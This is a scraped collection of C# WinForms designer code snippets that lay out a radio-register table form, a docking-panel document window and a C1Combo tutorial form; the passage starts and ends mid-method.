     this.tbRegOcp.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegPaRamp
     //
     this.tbRegPaRamp.Location  = new System.Drawing.Point(237, 177);
     this.tbRegPaRamp.Name      = "tbRegPaRamp";
     this.tbRegPaRamp.ReadOnly  = true;
     this.tbRegPaRamp.Size      = new System.Drawing.Size(72, 22);
     this.tbRegPaRamp.TabIndex  = 11;
     this.tbRegPaRamp.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegPaConfig
     //
     this.tbRegPaConfig.Location  = new System.Drawing.Point(237, 148);
     this.tbRegPaConfig.Name      = "tbRegPaConfig";
     this.tbRegPaConfig.ReadOnly  = true;
     this.tbRegPaConfig.Size      = new System.Drawing.Size(72, 22);
     this.tbRegPaConfig.TabIndex  = 11;
     this.tbRegPaConfig.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegFrLsb
     //
     this.tbRegFrLsb.Location  = new System.Drawing.Point(237, 119);
     this.tbRegFrLsb.Name      = "tbRegFrLsb";
     this.tbRegFrLsb.ReadOnly  = true;
     this.tbRegFrLsb.Size      = new System.Drawing.Size(72, 22);
     this.tbRegFrLsb.TabIndex  = 11;
     this.tbRegFrLsb.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegFrMid
     //
     this.tbRegFrMid.Location  = new System.Drawing.Point(237, 90);
     this.tbRegFrMid.Name      = "tbRegFrMid";
     this.tbRegFrMid.ReadOnly  = true;
     this.tbRegFrMid.Size      = new System.Drawing.Size(72, 22);
     this.tbRegFrMid.TabIndex  = 11;
     this.tbRegFrMid.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegFrMsb
     //
     this.tbRegFrMsb.Location  = new System.Drawing.Point(237, 61);
     this.tbRegFrMsb.Name      = "tbRegFrMsb";
     this.tbRegFrMsb.ReadOnly  = true;
     this.tbRegFrMsb.Size      = new System.Drawing.Size(72, 22);
     this.tbRegFrMsb.TabIndex  = 11;
     this.tbRegFrMsb.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // tbRegOpMode
     //
     this.tbRegOpMode.Location  = new System.Drawing.Point(237, 32);
     this.tbRegOpMode.Name      = "tbRegOpMode";
     this.tbRegOpMode.ReadOnly  = true;
     this.tbRegOpMode.Size      = new System.Drawing.Size(72, 22);
     this.tbRegOpMode.TabIndex  = 11;
     this.tbRegOpMode.TextAlign = System.Windows.Forms.HorizontalAlignment.Center;
     //
     // label55
     //
     this.label55.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label55.AutoSize = true;
     this.label55.Font     = new System.Drawing.Font("Arial Unicode MS", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
     this.label55.Location = new System.Drawing.Point(503, 6);
     this.label55.Name     = "label55";
     this.label55.Size     = new System.Drawing.Size(60, 16);
     this.label55.TabIndex = 0;
     this.label55.Text     = "Address";
     //
     // label39
     //
     this.label39.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label39.AutoSize = true;
     this.label39.Font     = new System.Drawing.Font("Arial Unicode MS", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
     this.label39.Location = new System.Drawing.Point(381, 6);
     this.label39.Name     = "label39";
     this.label39.Size     = new System.Drawing.Size(69, 16);
     this.label39.TabIndex = 9;
     this.label39.Text     = "Regsister";
     //
     // label9
     //
     this.label9.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label9.AutoSize = true;
     this.label9.Font     = new System.Drawing.Font("Arial Unicode MS", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
     this.label9.Location = new System.Drawing.Point(43, 6);
     this.label9.Name     = "label9";
     this.label9.Size     = new System.Drawing.Size(69, 16);
     this.label9.TabIndex = 0;
     this.label9.Text     = "Regsister";
     //
     // label32
     //
     this.label32.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label32.AutoSize = true;
     this.label32.Font     = new System.Drawing.Font("Arial Unicode MS", 9F, System.Drawing.FontStyle.Bold, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
     this.label32.Location = new System.Drawing.Point(165, 6);
     this.label32.Name     = "label32";
     this.label32.Size     = new System.Drawing.Size(60, 16);
     this.label32.TabIndex = 0;
     this.label32.Text     = "Address";
     //
     // label37
     //
     this.label37.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label37.AutoSize = true;
     this.label37.Location = new System.Drawing.Point(179, 36);
     this.label37.Name     = "label37";
     this.label37.Size     = new System.Drawing.Size(31, 15);
     this.label37.TabIndex = 0;
     this.label37.Text     = "0x01";
     //
     // label36
     //
     this.label36.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label36.AutoSize = true;
     this.label36.Location = new System.Drawing.Point(179, 65);
     this.label36.Name     = "label36";
     this.label36.Size     = new System.Drawing.Size(31, 15);
     this.label36.TabIndex = 0;
     this.label36.Text     = "0x06";
     //
     // label35
     //
     this.label35.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label35.AutoSize = true;
     this.label35.Location = new System.Drawing.Point(179, 94);
     this.label35.Name     = "label35";
     this.label35.Size     = new System.Drawing.Size(31, 15);
     this.label35.TabIndex = 0;
     this.label35.Text     = "0x07";
     //
     // label34
     //
     this.label34.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label34.AutoSize = true;
     this.label34.Location = new System.Drawing.Point(179, 123);
     this.label34.Name     = "label34";
     this.label34.Size     = new System.Drawing.Size(31, 15);
     this.label34.TabIndex = 0;
     this.label34.Text     = "0x08";
     //
     // label33
     //
     this.label33.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label33.AutoSize = true;
     this.label33.Location = new System.Drawing.Point(179, 152);
     this.label33.Name     = "label33";
     this.label33.Size     = new System.Drawing.Size(31, 15);
     this.label33.TabIndex = 0;
     this.label33.Text     = "0x09";
     //
     // label31
     //
     this.label31.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label31.AutoSize = true;
     this.label31.Location = new System.Drawing.Point(179, 181);
     this.label31.Name     = "label31";
     this.label31.Size     = new System.Drawing.Size(32, 15);
     this.label31.TabIndex = 0;
     this.label31.Text     = "0x0A";
     //
     // label30
     //
     this.label30.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label30.AutoSize = true;
     this.label30.Location = new System.Drawing.Point(179, 210);
     this.label30.Name     = "label30";
     this.label30.Size     = new System.Drawing.Size(32, 15);
     this.label30.TabIndex = 0;
     this.label30.Text     = "0x0B";
     //
     // label8
     //
     this.label8.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label8.AutoSize = true;
     this.label8.Location = new System.Drawing.Point(54, 210);
     this.label8.Name     = "label8";
     this.label8.Size     = new System.Drawing.Size(48, 15);
     this.label8.TabIndex = 3;
     this.label8.Text     = "RegOcp";
     //
     // label7
     //
     this.label7.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label7.AutoSize = true;
     this.label7.Location = new System.Drawing.Point(44, 181);
     this.label7.Name     = "label7";
     this.label7.Size     = new System.Drawing.Size(68, 15);
     this.label7.TabIndex = 4;
     this.label7.Text     = "RegPaRamp";
     //
     // label6
     //
     this.label6.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label6.AutoSize = true;
     this.label6.Location = new System.Drawing.Point(42, 152);
     this.label6.Name     = "label6";
     this.label6.Size     = new System.Drawing.Size(71, 15);
     this.label6.TabIndex = 1;
     this.label6.Text     = "RegPaConfig";
     //
     // label5
     //
     this.label5.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label5.AutoSize = true;
     this.label5.Location = new System.Drawing.Point(50, 123);
     this.label5.Name     = "label5";
     this.label5.Size     = new System.Drawing.Size(56, 15);
     this.label5.TabIndex = 2;
     this.label5.Text     = "RegFrLsb";
     //
     // label4
     //
     this.label4.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label4.AutoSize = true;
     this.label4.Location = new System.Drawing.Point(50, 94);
     this.label4.Name     = "label4";
     this.label4.Size     = new System.Drawing.Size(55, 15);
     this.label4.TabIndex = 7;
     this.label4.Text     = "RegFrMid";
     //
     // label3
     //
     this.label3.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label3.AutoSize = true;
     this.label3.Location = new System.Drawing.Point(48, 65);
     this.label3.Name     = "label3";
     this.label3.Size     = new System.Drawing.Size(59, 15);
     this.label3.TabIndex = 8;
     this.label3.Text     = "RegFrMsb";
     //
     // label29
     //
     this.label29.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label29.AutoSize = true;
     this.label29.Location = new System.Drawing.Point(178, 239);
     this.label29.Name     = "label29";
     this.label29.Size     = new System.Drawing.Size(33, 15);
     this.label29.TabIndex = 0;
     this.label29.Text     = "0x0C";
     //
     // label10
     //
     this.label10.Anchor   = System.Windows.Forms.AnchorStyles.None;
     this.label10.AutoSize = true;
     this.label10.Location = new System.Drawing.Point(55, 239);
     this.label10.Name     = "label10";
     this.label10.Size     = new System.Drawing.Size(45, 15);
     this.label10.TabIndex = 0;
     this.label10.Text     = "RegLna";
     //
     // tableLayoutPanel1
     //
     this.tableLayoutPanel1.ColumnCount = 7;
     this.tableLayoutPanel1.ColumnStyles.Add(new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 24F));
     this.tableLayoutPanel1.ColumnStyles.Add(new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 12F));
     this.tableLayoutPanel1.ColumnStyles.Add(new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 12F));
     this.tableLayoutPanel1.ColumnStyles.Add(new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 4F));
     this.tableLayoutPanel1.ColumnStyles.Add(new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 24F));
     this.tableLayoutPanel1.ColumnStyles.Add(new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 12F));
     this.tableLayoutPanel1.ColumnStyles.Add(new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Percent, 12F));
     this.tableLayoutPanel1.ColumnStyles.Add(new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Absolute, 20F));
     this.tableLayoutPanel1.ColumnStyles.Add(new System.Windows.Forms.ColumnStyle(System.Windows.Forms.SizeType.Absolute, 20F));
     this.tableLayoutPanel1.Controls.Add(this.label32, 1, 0);
     this.tableLayoutPanel1.Controls.Add(this.label9, 0, 0);
     this.tableLayoutPanel1.Controls.Add(this.label39, 4, 0);
     this.tableLayoutPanel1.Controls.Add(this.label55, 5, 0);
     this.tableLayoutPanel1.Controls.Add(this.label56, 2, 0);
     this.tableLayoutPanel1.Controls.Add(this.label57, 6, 0);
     this.tableLayoutPanel1.Controls.Add(this.label42, 4, 1);
     this.tableLayoutPanel1.Controls.Add(this.label43, 4, 2);
     this.tableLayoutPanel1.Controls.Add(this.label44, 4, 3);
     this.tableLayoutPanel1.Controls.Add(this.label45, 4, 4);
     this.tableLayoutPanel1.Controls.Add(this.label46, 4, 5);
     this.tableLayoutPanel1.Controls.Add(this.label70, 4, 6);
     this.tableLayoutPanel1.Controls.Add(this.label69, 4, 7);
     this.tableLayoutPanel1.Controls.Add(this.label71, 4, 8);
     this.tableLayoutPanel1.Controls.Add(this.label72, 4, 9);
     this.tableLayoutPanel1.Controls.Add(this.label2, 0, 1);
     this.tableLayoutPanel1.Controls.Add(this.label37, 1, 1);
     this.tableLayoutPanel1.Controls.Add(this.tbRegOpMode, 2, 1);
     this.tableLayoutPanel1.Controls.Add(this.label3, 0, 2);
     this.tableLayoutPanel1.Controls.Add(this.label36, 1, 2);
     this.tableLayoutPanel1.Controls.Add(this.tbRegFrMsb, 2, 2);
     this.tableLayoutPanel1.Controls.Add(this.tbRegFrMid, 2, 3);
     this.tableLayoutPanel1.Controls.Add(this.tbRegFrLsb, 2, 4);
     this.tableLayoutPanel1.Controls.Add(this.tbRegPaConfig, 2, 5);
     this.tableLayoutPanel1.Controls.Add(this.tbRegPaRamp, 2, 6);
     this.tableLayoutPanel1.Controls.Add(this.tbRegOcp, 2, 7);
     this.tableLayoutPanel1.Controls.Add(this.tbRegLna, 2, 8);
     this.tableLayoutPanel1.Controls.Add(this.tbRegIrqFlagsMask, 2, 9);
     this.tableLayoutPanel1.Controls.Add(this.label4, 0, 3);
     this.tableLayoutPanel1.Controls.Add(this.label5, 0, 4);
     this.tableLayoutPanel1.Controls.Add(this.label6, 0, 5);
     this.tableLayoutPanel1.Controls.Add(this.label7, 0, 6);
     this.tableLayoutPanel1.Controls.Add(this.label8, 0, 7);
     this.tableLayoutPanel1.Controls.Add(this.label10, 0, 8);
     this.tableLayoutPanel1.Controls.Add(this.label15, 0, 9);
     this.tableLayoutPanel1.Controls.Add(this.label35, 1, 3);
     this.tableLayoutPanel1.Controls.Add(this.label34, 1, 4);
     this.tableLayoutPanel1.Controls.Add(this.label33, 1, 5);
     this.tableLayoutPanel1.Controls.Add(this.label31, 1, 6);
     this.tableLayoutPanel1.Controls.Add(this.label30, 1, 7);
     this.tableLayoutPanel1.Controls.Add(this.label29, 1, 8);
     this.tableLayoutPanel1.Controls.Add(this.label24, 1, 9);
     this.tableLayoutPanel1.Controls.Add(this.label64, 5, 1);
     this.tableLayoutPanel1.Controls.Add(this.tbRegModemConfig1, 6, 1);
     this.tableLayoutPanel1.Controls.Add(this.tbRegModemConfig2, 6, 2);
     this.tableLayoutPanel1.Controls.Add(this.tbRegSymbTimeoutLsb, 6, 3);
     this.tableLayoutPanel1.Controls.Add(this.tbRegPreambleMsb, 6, 4);
     this.tableLayoutPanel1.Controls.Add(this.tbRegPreambleLsb, 6, 5);
     this.tableLayoutPanel1.Controls.Add(this.tbRegModemConfig3, 6, 6);
     this.tableLayoutPanel1.Controls.Add(this.tbRegTcxo, 6, 7);
     this.tableLayoutPanel1.Controls.Add(this.tbRegPaDac, 6, 8);
     this.tableLayoutPanel1.Controls.Add(this.tbRegPllHf, 6, 9);
     this.tableLayoutPanel1.Controls.Add(this.label65, 5, 2);
     this.tableLayoutPanel1.Controls.Add(this.label66, 5, 3);
     this.tableLayoutPanel1.Controls.Add(this.label73, 5, 4);
     this.tableLayoutPanel1.Controls.Add(this.label74, 5, 5);
     this.tableLayoutPanel1.Controls.Add(this.label79, 5, 6);
     this.tableLayoutPanel1.Controls.Add(this.label82, 5, 7);
     this.tableLayoutPanel1.Controls.Add(this.label80, 5, 8);
     this.tableLayoutPanel1.Controls.Add(this.label81, 5, 9);
     this.tableLayoutPanel1.Font     = new System.Drawing.Font("Arial Unicode MS", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(134)));
     this.tableLayoutPanel1.Location = new System.Drawing.Point(0, 0);
     this.tableLayoutPanel1.Name     = "tableLayoutPanel1";
     this.tableLayoutPanel1.RowCount = 10;
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.RowStyles.Add(new System.Windows.Forms.RowStyle(System.Windows.Forms.SizeType.Percent, 10F));
     this.tableLayoutPanel1.Size     = new System.Drawing.Size(654, 294);
     this.tableLayoutPanel1.TabIndex = 0;
     //
     // RegTable
     //
     this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
     this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
     this.ClientSize          = new System.Drawing.Size(656, 297);
     this.Controls.Add(this.tableLayoutPanel1);
     this.Icon        = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
     this.MaximizeBox = false;
     this.Name        = "RegTable";
     this.Text        = "RegTable";
     this.tableLayoutPanel1.ResumeLayout(false);
     this.tableLayoutPanel1.PerformLayout();
     this.ResumeLayout(false);
 }
Example #46
0
        /// <summary>
        /// Required method for Designer support - do not modify
        /// the contents of this method with the code editor.
        /// </summary>
        private void InitializeComponent()
        {
            this.components = new System.ComponentModel.Container();
            WeifenLuo.WinFormsUI.Docking.DockPanelSkin                   dockPanelSkin1                   = new WeifenLuo.WinFormsUI.Docking.DockPanelSkin();
            WeifenLuo.WinFormsUI.Docking.AutoHideStripSkin               autoHideStripSkin1               = new WeifenLuo.WinFormsUI.Docking.AutoHideStripSkin();
            WeifenLuo.WinFormsUI.Docking.DockPanelGradient               dockPanelGradient1               = new WeifenLuo.WinFormsUI.Docking.DockPanelGradient();
            WeifenLuo.WinFormsUI.Docking.TabGradient                     tabGradient1                     = new WeifenLuo.WinFormsUI.Docking.TabGradient();
            WeifenLuo.WinFormsUI.Docking.DockPaneStripSkin               dockPaneStripSkin1               = new WeifenLuo.WinFormsUI.Docking.DockPaneStripSkin();
            WeifenLuo.WinFormsUI.Docking.DockPaneStripGradient           dockPaneStripGradient1           = new WeifenLuo.WinFormsUI.Docking.DockPaneStripGradient();
            WeifenLuo.WinFormsUI.Docking.TabGradient                     tabGradient2                     = new WeifenLuo.WinFormsUI.Docking.TabGradient();
            WeifenLuo.WinFormsUI.Docking.DockPanelGradient               dockPanelGradient2               = new WeifenLuo.WinFormsUI.Docking.DockPanelGradient();
            WeifenLuo.WinFormsUI.Docking.TabGradient                     tabGradient3                     = new WeifenLuo.WinFormsUI.Docking.TabGradient();
            WeifenLuo.WinFormsUI.Docking.DockPaneStripToolWindowGradient dockPaneStripToolWindowGradient1 = new WeifenLuo.WinFormsUI.Docking.DockPaneStripToolWindowGradient();
            WeifenLuo.WinFormsUI.Docking.TabGradient                     tabGradient4                     = new WeifenLuo.WinFormsUI.Docking.TabGradient();
            WeifenLuo.WinFormsUI.Docking.TabGradient                     tabGradient5                     = new WeifenLuo.WinFormsUI.Docking.TabGradient();
            WeifenLuo.WinFormsUI.Docking.DockPanelGradient               dockPanelGradient3               = new WeifenLuo.WinFormsUI.Docking.DockPanelGradient();
            WeifenLuo.WinFormsUI.Docking.TabGradient                     tabGradient6                     = new WeifenLuo.WinFormsUI.Docking.TabGradient();
            WeifenLuo.WinFormsUI.Docking.TabGradient                     tabGradient7                     = new WeifenLuo.WinFormsUI.Docking.TabGradient();
            System.ComponentModel.ComponentResourceManager               resources = new System.ComponentModel.ComponentResourceManager(typeof(frmCR2WDocument));
            this.imageList1 = new System.Windows.Forms.ImageList(this.components);
            this.dockPanel  = new WeifenLuo.WinFormsUI.Docking.DockPanel();
            this.SuspendLayout();
            //
            // imageList1
            //
            this.imageList1.ColorDepth       = System.Windows.Forms.ColorDepth.Depth8Bit;
            this.imageList1.ImageSize        = new System.Drawing.Size(16, 16);
            this.imageList1.TransparentColor = System.Drawing.Color.Transparent;

            //
            // dockPanel
            //
            this.dockPanel.Dock                                      = System.Windows.Forms.DockStyle.Fill;
            this.dockPanel.DockBackColor                             = System.Drawing.SystemColors.AppWorkspace;
            this.dockPanel.DockBottomPortion                         = 150D;
            this.dockPanel.DockLeftPortion                           = 200D;
            this.dockPanel.DockRightPortion                          = 200D;
            this.dockPanel.DockTopPortion                            = 150D;
            this.dockPanel.DocumentStyle                             = WeifenLuo.WinFormsUI.Docking.DocumentStyle.DockingWindow;
            this.dockPanel.Font                                      = new System.Drawing.Font("Tahoma", 11F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.World, ((byte)(0)));
            this.dockPanel.Location                                  = new System.Drawing.Point(0, 0);
            this.dockPanel.Name                                      = "dockPanel";
            this.dockPanel.RightToLeftLayout                         = true;
            this.dockPanel.Size                                      = new System.Drawing.Size(588, 395);
            dockPanelGradient1.EndColor                              = System.Drawing.SystemColors.ControlLight;
            dockPanelGradient1.StartColor                            = System.Drawing.Color.FromArgb(((int)(((byte)(0)))), ((int)(((byte)(122)))), ((int)(((byte)(204)))));
            autoHideStripSkin1.DockStripGradient                     = dockPanelGradient1;
            tabGradient1.EndColor                                    = System.Drawing.SystemColors.Control;
            tabGradient1.StartColor                                  = System.Drawing.SystemColors.Control;
            tabGradient1.TextColor                                   = System.Drawing.SystemColors.ControlDarkDark;
            autoHideStripSkin1.TabGradient                           = tabGradient1;
            autoHideStripSkin1.TextFont                              = new System.Drawing.Font("Segoe UI", 9F);
            dockPanelSkin1.AutoHideStripSkin                         = autoHideStripSkin1;
            tabGradient2.EndColor                                    = System.Drawing.Color.FromArgb(((int)(((byte)(204)))), ((int)(((byte)(206)))), ((int)(((byte)(219)))));
            tabGradient2.StartColor                                  = System.Drawing.Color.FromArgb(((int)(((byte)(0)))), ((int)(((byte)(122)))), ((int)(((byte)(204)))));
            tabGradient2.TextColor                                   = System.Drawing.Color.White;
            dockPaneStripGradient1.ActiveTabGradient                 = tabGradient2;
            dockPanelGradient2.EndColor                              = System.Drawing.SystemColors.Control;
            dockPanelGradient2.StartColor                            = System.Drawing.SystemColors.Control;
            dockPaneStripGradient1.DockStripGradient                 = dockPanelGradient2;
            tabGradient3.EndColor                                    = System.Drawing.Color.FromArgb(((int)(((byte)(28)))), ((int)(((byte)(151)))), ((int)(((byte)(234)))));
            tabGradient3.StartColor                                  = System.Drawing.SystemColors.Control;
            tabGradient3.TextColor                                   = System.Drawing.Color.Black;
            dockPaneStripGradient1.InactiveTabGradient               = tabGradient3;
            dockPaneStripSkin1.DocumentGradient                      = dockPaneStripGradient1;
            dockPaneStripSkin1.TextFont                              = new System.Drawing.Font("Segoe UI", 9F);
            tabGradient4.EndColor                                    = System.Drawing.Color.FromArgb(((int)(((byte)(80)))), ((int)(((byte)(170)))), ((int)(((byte)(220)))));
            tabGradient4.LinearGradientMode                          = System.Drawing.Drawing2D.LinearGradientMode.Vertical;
            tabGradient4.StartColor                                  = System.Drawing.Color.FromArgb(((int)(((byte)(0)))), ((int)(((byte)(122)))), ((int)(((byte)(204)))));
            tabGradient4.TextColor                                   = System.Drawing.Color.White;
            dockPaneStripToolWindowGradient1.ActiveCaptionGradient   = tabGradient4;
            tabGradient5.EndColor                                    = System.Drawing.SystemColors.ControlLightLight;
            tabGradient5.StartColor                                  = System.Drawing.SystemColors.ControlLightLight;
            tabGradient5.TextColor                                   = System.Drawing.Color.FromArgb(((int)(((byte)(0)))), ((int)(((byte)(122)))), ((int)(((byte)(204)))));
            dockPaneStripToolWindowGradient1.ActiveTabGradient       = tabGradient5;
            dockPanelGradient3.EndColor                              = System.Drawing.SystemColors.Control;
            dockPanelGradient3.StartColor                            = System.Drawing.SystemColors.Control;
            dockPaneStripToolWindowGradient1.DockStripGradient       = dockPanelGradient3;
            tabGradient6.EndColor                                    = System.Drawing.SystemColors.ControlDark;
            tabGradient6.LinearGradientMode                          = System.Drawing.Drawing2D.LinearGradientMode.Vertical;
            tabGradient6.StartColor                                  = System.Drawing.SystemColors.Control;
            tabGradient6.TextColor                                   = System.Drawing.SystemColors.GrayText;
            dockPaneStripToolWindowGradient1.InactiveCaptionGradient = tabGradient6;
            tabGradient7.EndColor                                    = System.Drawing.SystemColors.Control;
            tabGradient7.StartColor                                  = System.Drawing.SystemColors.Control;
            tabGradient7.TextColor                                   = System.Drawing.SystemColors.GrayText;
            dockPaneStripToolWindowGradient1.InactiveTabGradient     = tabGradient7;
            dockPaneStripSkin1.ToolWindowGradient                    = dockPaneStripToolWindowGradient1;
            dockPanelSkin1.DockPaneStripSkin                         = dockPaneStripSkin1;
            this.dockPanel.TabIndex                                  = 1;
            //
            // frmCR2WDocument
            //
            this.AutoScaleDimensions = new System.Drawing.SizeF(6F, 13F);
            this.AutoScaleMode       = System.Windows.Forms.AutoScaleMode.Font;
            this.AutoScroll          = true;
            this.ClientSize          = new System.Drawing.Size(588, 395);
            this.Controls.Add(this.dockPanel);
            this.DockAreas   = ((WeifenLuo.WinFormsUI.Docking.DockAreas)((WeifenLuo.WinFormsUI.Docking.DockAreas.Float | WeifenLuo.WinFormsUI.Docking.DockAreas.Document)));
            this.Font        = new System.Drawing.Font("Microsoft Sans Serif", 8.25F, System.Drawing.FontStyle.Regular, System.Drawing.GraphicsUnit.Point, ((byte)(0)));
            this.Icon        = ((System.Drawing.Icon)(resources.GetObject("$this.Icon")));
            this.Name        = "frmCR2WDocument";
            this.Text        = "frmCR2WDocument";
            this.FormClosed += new System.Windows.Forms.FormClosedEventHandler(this.frmCR2WDocument_FormClosed);
            this.ResumeLayout(false);
        }
Example #47
0
 /// <summary>
 /// Required method for Designer support - do not modify
 /// the contents of this method with the code editor.
 /// </summary>
 private void InitializeComponent()
 {
     C1.Win.C1List.Style style1 = new C1.Win.C1List.Style();
     C1.Win.C1List.Style style2 = new C1.Win.C1List.Style();
     C1.Win.C1List.Style style3 = new C1.Win.C1List.Style();
     C1.Win.C1List.Style style4 = new C1.Win.C1List.Style();
     C1.Win.C1List.Style style5 = new C1.Win.C1List.Style();
     System.ComponentModel.ComponentResourceManager resources = new System.ComponentModel.ComponentResourceManager(typeof(Form1));
     C1.Win.C1List.Style style6 = new C1.Win.C1List.Style();
     C1.Win.C1List.Style style7 = new C1.Win.C1List.Style();
     C1.Win.C1List.Style style8 = new C1.Win.C1List.Style();
     this.c1Combo1            = new C1.Win.C1List.C1Combo();
     this.contextMenu1        = new System.Windows.Forms.ContextMenu();
     this.menuItem1           = new System.Windows.Forms.MenuItem();
     this.menuItem2           = new System.Windows.Forms.MenuItem();
     this.menuItem3           = new System.Windows.Forms.MenuItem();
     this.button1             = new System.Windows.Forms.Button();
     this.label1              = new System.Windows.Forms.Label();
     this.oleDbSelectCommand1 = new System.Data.OleDb.OleDbCommand();
     this.oleDbDataAdapter1   = new System.Data.OleDb.OleDbDataAdapter();
     this.oleDbConnection1    = new System.Data.OleDb.OleDbConnection();
     this.dsComposer1         = new Tutorial20.DsComposer();
     ((System.ComponentModel.ISupportInitialize)(this.c1Combo1)).BeginInit();
     ((System.ComponentModel.ISupportInitialize)(this.dsComposer1)).BeginInit();
     this.SuspendLayout();
     //
     // c1Combo1
     //
     this.c1Combo1.AddItemSeparator    = ';';
     this.c1Combo1.Caption             = "";
     this.c1Combo1.CaptionHeight       = 17;
     this.c1Combo1.CaptionStyle        = style1;
     this.c1Combo1.CharacterCasing     = System.Windows.Forms.CharacterCasing.Normal;
     this.c1Combo1.ColumnCaptionHeight = 17;
     this.c1Combo1.ColumnFooterHeight  = 17;
     this.c1Combo1.ColumnWidth         = 100;
     this.c1Combo1.ContentHeight       = 15;
     this.c1Combo1.ContextMenu         = this.contextMenu1;
     this.c1Combo1.DataMember          = "Composer";
     this.c1Combo1.DataSource          = this.dsComposer1;
     this.c1Combo1.DeadAreaBackColor   = System.Drawing.Color.Empty;
     this.c1Combo1.DisplayMember       = "First";
     this.c1Combo1.EditorBackColor     = System.Drawing.SystemColors.Window;
     this.c1Combo1.EditorFont          = new System.Drawing.Font("Microsoft Sans Serif", 8.25F);
     this.c1Combo1.EditorForeColor     = System.Drawing.SystemColors.WindowText;
     this.c1Combo1.EditorHeight        = 15;
     this.c1Combo1.EvenRowStyle        = style2;
     this.c1Combo1.FlatStyle           = C1.Win.C1List.FlatModeEnum.Standard;
     this.c1Combo1.FooterStyle         = style3;
     this.c1Combo1.GapHeight           = 2;
     this.c1Combo1.HeadingStyle        = style4;
     this.c1Combo1.HighLightRowStyle   = style5;
     this.c1Combo1.Images.Add(((System.Drawing.Image)(resources.GetObject("c1Combo1.Images"))));
     this.c1Combo1.ItemHeight        = 15;
     this.c1Combo1.Location          = new System.Drawing.Point(40, 32);
     this.c1Combo1.MatchEntryTimeout = ((long)(100));
     this.c1Combo1.MaxDropDownItems  = ((short)(5));
     this.c1Combo1.MaxLength         = 32767;
     this.c1Combo1.MouseCursor       = System.Windows.Forms.Cursors.Default;
     this.c1Combo1.Name               = "c1Combo1";
     this.c1Combo1.OddRowStyle        = style6;
     this.c1Combo1.RowDivider.Color   = System.Drawing.Color.DarkGray;
     this.c1Combo1.RowDivider.Style   = C1.Win.C1List.LineStyleEnum.None;
     this.c1Combo1.RowSubDividerColor = System.Drawing.Color.DarkGray;
     this.c1Combo1.SelectedStyle      = style7;
     this.c1Combo1.Size               = new System.Drawing.Size(184, 21);
     this.c1Combo1.Style              = style8;
     this.c1Combo1.TabIndex           = 0;
     this.c1Combo1.Text               = "c1Combo1";
     this.c1Combo1.KeyPress          += new System.Windows.Forms.KeyPressEventHandler(this.c1Combo1_KeyPress);
     this.c1Combo1.PropBag            = resources.GetString("c1Combo1.PropBag");
     //
     // contextMenu1
     //
     this.contextMenu1.MenuItems.AddRange(new System.Windows.Forms.MenuItem[] {
         this.menuItem1,
         this.menuItem2,
         this.menuItem3
     });
     //
     // menuItem1
     //
     this.menuItem1.Index = 0;
     this.menuItem1.Text  = "Welcome";
     //
     // menuItem2
